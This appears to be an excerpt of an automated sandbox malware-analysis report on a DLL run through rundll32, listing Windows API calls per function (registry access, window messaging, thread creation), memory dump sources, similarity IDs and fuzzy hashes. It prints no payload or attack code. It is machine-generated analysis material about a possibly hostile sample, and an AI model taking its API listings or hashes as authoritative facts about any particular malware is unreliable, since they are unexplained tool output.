                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2841959276-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                    • _memset.LIBCMT ref: 10029DA5
                                                                                                                      • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                      • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2905758408-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3574576181-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                    • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                    Strings
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                    • String ID: Software\
                                                                                                                    • API String ID: 3878845136-964853688
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 1001AC38
                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                    • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                    • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                    • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                    • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2853195852-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3219385341-0
                                                                                                                    • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                    • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                    • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                    • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                    • GetParent.USER32(?), ref: 1002A22C
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                    • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                    • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$LongParentVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 506644340-0
                                                                                                                    • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                    • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                    • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                    • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                    • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                    • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                    • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                    • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                    • String ID: V&'
                                                                                                                    • API String ID: 1067611704-802299783
                                                                                                                    • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                    • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                    • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                    • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                      • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2004563703-0
                                                                                                                    • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                    • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                    • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                    • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                    • String ID: software
                                                                                                                    • API String ID: 1740278721-2010147023
                                                                                                                    • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                    • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                    • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                    • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                      • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                      • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                      • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                      • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Task_impl$H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1204490572-0
                                                                                                                    • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                    • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                    • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                    • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                      • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                    • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 356813703-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Brush
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2798902688-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                      • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                      • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 63617653-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                    • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                      • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                    • _memset.LIBCMT ref: 1002D2F2
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4021759052-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 1002D5FF
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                      • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocString$H_prolog3_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842698744-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                    • SendMessageA.USER32 ref: 10016A5B
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1877664794-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                    • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                    • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                    • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                    • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                    • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 670545878-0
